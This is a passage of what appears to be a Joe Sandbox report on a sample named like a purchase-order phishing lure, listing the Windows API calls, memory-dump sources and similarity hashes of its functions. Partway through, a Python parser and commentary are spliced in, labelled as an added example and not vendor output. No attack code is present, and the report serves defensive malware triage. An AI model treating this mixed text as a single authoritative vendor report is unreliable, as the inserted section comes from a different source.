                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
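The function records above (an "APIs" list of call sites followed by a "Similarity" block of IDs and fuzzy hashes) are what a triager compares across reports: which functions resolve imports by name, which blocks share an API/string profile but differ in code, and where a given API is called. The Python below is an added example, not Joe Sandbox's own code or tooling; it assumes only the two line shapes visible in this report ("• Api.MODULE(args), ref: ADDR" and "• Key: value") and is fed an excerpt copied from the records on this page, trimmed to the lines it reads.

```python
"""Parse Joe Sandbox per-function records (the 'APIs' / 'Similarity' blocks
shown on this page) into structured data and query them.

Added example, not Joe Sandbox's own code. Assumes only the line shapes
visible in the report: '• Api.MODULE(args), ref: ADDR' and '• Key: value'.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
SIMILARITY_KEYS = {"API ID", "String ID", "API String ID", "Opcode ID",
                   "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}


@dataclass
class ApiCall:
    api: str       # e.g. GetProcAddress
    module: str    # e.g. KERNEL32
    args: list     # '?' marks an argument the sandbox could not resolve
    ref: int       # call-site address (the 'ref:' value)


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)   # ApiCall objects in listing order
    fields: dict = field(default_factory=dict)  # Similarity key -> value


def parse_blocks(text):
    """Start a new record at every 'APIs' heading; collect its calls and Similarity fields."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            cur.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     int(m.group("ref"), 16)))
            continue
        m = FIELD_RE.match(line)
        if m and m.group("key") in SIMILARITY_KEYS:
            cur.fields[m.group("key")] = m.group("val")
    return blocks


def callers_of(blocks, api):
    """(Opcode ID, [call-site addresses]) for every block that calls `api`."""
    return [(b.fields.get("Opcode ID", ""), [c.ref for c in b.calls if c.api == api])
            for b in blocks if any(c.api == api for c in b.calls)]


def near_duplicates(blocks):
    """API String IDs shared by more than one distinct Opcode ID: functions with the
    same API/string profile but different code, like the SetErrorMode /
    GetDiskFreeSpaceExW wrappers in this report."""
    groups = defaultdict(set)
    for b in blocks:
        key = b.fields.get("API String ID")
        if key:
            groups[key].add(b.fields.get("Opcode ID", ""))
    return {k: v for k, v in groups.items() if len(v) > 1}


def resolved_exports(blocks):
    """Named symbols passed as the second argument to GetProcAddress, i.e. imports
    resolved at run time rather than through the import table."""
    return [c.args[1] for b in blocks for c in b.calls
            if c.api == "GetProcAddress" and len(c.args) > 1 and c.args[1] != "?"]


# Constructed input: an excerpt copied from the records above, trimmed to the
# lines this parser reads.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: dcd865906ac5040e6418ceb55575901707d9396e778d7393d7920faf26aa26a4
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Similarity
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Similarity
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
"""

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print("run-time resolved exports:", resolved_exports(parsed))
    print("same profile, different code:", near_duplicates(parsed))
    print("GetDiskFreeSpaceExW call sites:", callers_of(parsed, "GetDiskFreeSpaceExW"))
```

On the excerpt, `resolved_exports` returns the single name `AU3_GetPluginDetails`, the export name the AutoIt runtime looks up in plugin DLLs, which is consistent with the rest of the listing (SysTreeView32, SysMonthCal32, msctls_updown32 and msctls_trackbar32 are the common-control class names the AutoIt GUI layer creates). `near_duplicates` groups the SetErrorMode / GetDiskFreeSpaceExW blocks at 0045D79D and 0045D87B under API String ID 1682464887-234962358 while their Opcode IDs differ, which is the signal that the Similarity block is meant to give: same imports and strings, different function body. The parser deliberately keeps `?` arguments as-is rather than dropping them, so positional lookups such as the second argument of GetProcAddress stay correct.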
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                            • String ID: crts
                                                            • API String ID: 943502515-3724388283
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$LabelVolume
                                                            • String ID: \VH
                                                            • API String ID: 2006950084-234962358
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                            • DrawMenuBar.USER32 ref: 00449761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                            • String ID: 0
                                                            • API String ID: 772068139-4108050209
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcscpy
                                                            • String ID: 3, 3, 8, 1
                                                            • API String ID: 3469035223-357260408
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                            • API String ID: 2574300362-3530519716
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                            • API String ID: 2574300362-275556492
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                            • API String ID: 2574300362-58917771
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                            • __itow.LIBCMT ref: 004699CD
                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                            • __itow.LIBCMT ref: 00469A97
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                            APIs
                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
